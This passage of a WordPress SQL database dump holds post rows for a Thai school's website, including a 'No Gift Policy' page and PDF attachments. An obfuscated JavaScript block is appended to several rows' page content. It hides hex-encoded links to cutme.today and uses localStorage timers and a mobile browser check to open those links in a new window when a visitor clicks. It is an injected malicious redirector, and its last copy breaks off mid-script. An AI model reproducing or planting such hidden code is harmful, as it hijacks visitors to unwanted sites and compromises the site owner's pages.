referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-15 09:24:40','2024-08-15 02:24:40','',14,'http://pakhaeng.ssk.in.th/?p=827',0,'revision','',0),
(828,1,'2024-08-15 09:30:28','2024-08-15 02:30:28','<!-- wp:file {\"id\":864,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การสร้างวัฒนธรรม  No Gift Policy\"></object><a id=\"wp-block-file--media-7da7aa5d-5731-4846-be73-602d4acf5e41\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\">การสร้างวัฒนธรรม  No Gift Policy</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/การสร้างวัฒนธรรม-No-Gift-Policy.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-7da7aa5d-5731-4846-be73-602d4acf5e41\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','การสร้างวัฒนธรรม  No Gift Policy','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%a3%e0%b9%89%e0%b8%b2%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%92%e0%b8%99%e0%b8%98%e0%b8%a3%e0%b8%a3%e0%b8%a1-no-gift-policy','','','2024-08-15 11:56:02','2024-08-15 04:56:02','',0,'http://pakhaeng.ssk.in.th/?page_id=828',0,'page','',0),
(829,1,'2024-08-15 09:30:02','2024-08-15 02:30:02','','O27 การประชุมเพื่อเสริมสร้างความรู้ ความเข้าใจ','','inherit','','closed','','o27-%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%aa%e0%b8%a3%e0%b8%b4%e0%b8%a1%e0%b8%aa%e0%b8%a3','','','2024-08-15 09:30:02','2024-08-15 02:30:02','',828,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O27-การประชุมเพื่อเสริมสร้างความรู้-ความเข้าใจ.pdf',0,'attachment','application/pdf',0),
(830,1,'2024-08-15 09:30:28','2024-08-15 02:30:28','<!-- wp:file {\"id\":829,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O27-การประชุมเพื่อเสริมสร้างความรู้-ความเข้าใจ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O27-การประชุมเพื่อเสริมสร้างความรู้-ความเข้าใจ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"การสร้างวัฒนธรรม  No Gift Policy\"></object><a id=\"wp-block-file--media-83ca4ef4-4d78-4041-9d62-ef0e84d1befa\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O27-การประชุมเพื่อเสริมสร้างความรู้-ความเข้าใจ.pdf\">การสร้างวัฒนธรรม  No Gift Policy</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/O27-การประชุมเพื่อเสริมสร้างความรู้-ความเข้าใจ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-83ca4ef4-4d78-4041-9d62-ef0e84d1befa\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 